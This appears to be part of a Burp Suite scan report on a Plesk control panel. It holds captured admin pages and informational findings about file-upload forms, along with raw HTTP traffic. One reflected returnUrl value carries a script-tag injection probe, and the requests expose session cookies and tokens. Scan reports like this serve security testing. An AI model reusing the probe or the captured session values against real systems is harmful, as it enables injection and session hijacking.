<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController%2500da28a%3C%2Fscript%3Eda6245b28ac' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10"></TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="0">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-finish" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply the changes made on this screen and exit the wizard.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_finish" id="buttonid-finish" type="submit" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;">Finish</BUTTON><SPAN id="spanid-finish">Finish</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/custom-buttons/custom-button@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/certificate@

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/domain@1/certificate@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:39 GMT
Connection: close
Content-Length: 19232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>SSL Certificates</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.certificate/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function send_cert_oC(f)
       {
           if (f.cert_f.value == "") {
               alert("Select a certificate file");
               f.cert_f.focus();
               return false;
           }
           f.cmd.value="find";
           lsubmit(f);
           return false;
       }

       function demo()
       {
           alert("This function is not available in the demo version.");
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/certificate@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <p>SSL certificates are used for securing transfer of sensitive data sent to your website by its visitors, and for verifying the site identity.</p>
<p>After adding an SSL certificate to a domain, you need to enable SSL support and select that certificate in the website hosting settings.</p>

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-cert-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a new SSL certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;" style=""><BUTTON name="bname_cert_add" id="buttonid-cert-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;">Add SSL Certificate</BUTTON><SPAN id="spanid-cert-add">Add SSL Certificate</SPAN></DIV>
           <DIV class="commonButton" id="bid-cert-view" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;View the list of SSL certificates that you purchased from your provider.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;" style=""><BUTTON name="bname_cert_view" id="buttonid-cert-view" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;">View Certificates</BUTTON><SPAN id="spanid-cert-view">View Certificates</SPAN></DIV>
           
       </div>

   </td></tr></table></fieldset>
</div>

<div class="formArea">
   <fieldset>
       <legend>Find the appropriate private key to a certificate</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" width="100%" cellspacing="0" >
           <tr>
               <td class="name"><label for="fid-cert_f">Certificate</label></td>
               <td><input type="file" id="fid-cert_f" name="cert_f"></td>
           </tr>
       </table>

       <div class="formButtons">
           <DIV class="commonButton" id="bid-send-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Find the appropriate private key for the uploaded certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_send_file" id="buttonid-send-file" type="button" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;">Send File</BUTTON><SPAN id="spanid-send-file">Send File</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Certificates</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
           <script>
           function r(event)    { tooltip.set(event, [{"type":"string","string":"CSR part supplied."}]); }        // request
           function nr(event)    { tooltip.set(event, [{"type":"string","string":"CSR part not supplied."}]); }        // no request
           function p(event)    { tooltip.set(event, [{"type":"string","string":"Private key part supplied."}]); }    // private key
           function np(event)    { tooltip.set(event, [{"type":"string","string":"Private key part not supplied."}]); }    // no private key
           function c(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part supplied."}]); }        // certificate
           function nc(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part not supplied."}]); }    // no certificate
           function a(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part supplied."}]); }    // ca certificate
           function na(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part not supplied."}]); }    // no ca certificate
           function mo()    { tooltip.hide(); }                    // reset conhelp
           
           </script>
       <div class="paging pagingTop noList">No SSL certificates</div><div class="paging pagingBottom noList"></div><script>SetCookie("certificateslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CertificatesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CertificatesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CertificatesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CertificatesListSelectAll.checked;
                           CertificatesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CertificatesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function CertificatesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CertificatesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSearchShow()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CertificatesListSearchHide()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CertificatesListRemove(f)
           {
               if (0 == CertificatesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/certificate@";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvcNELhCBJg408XAA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
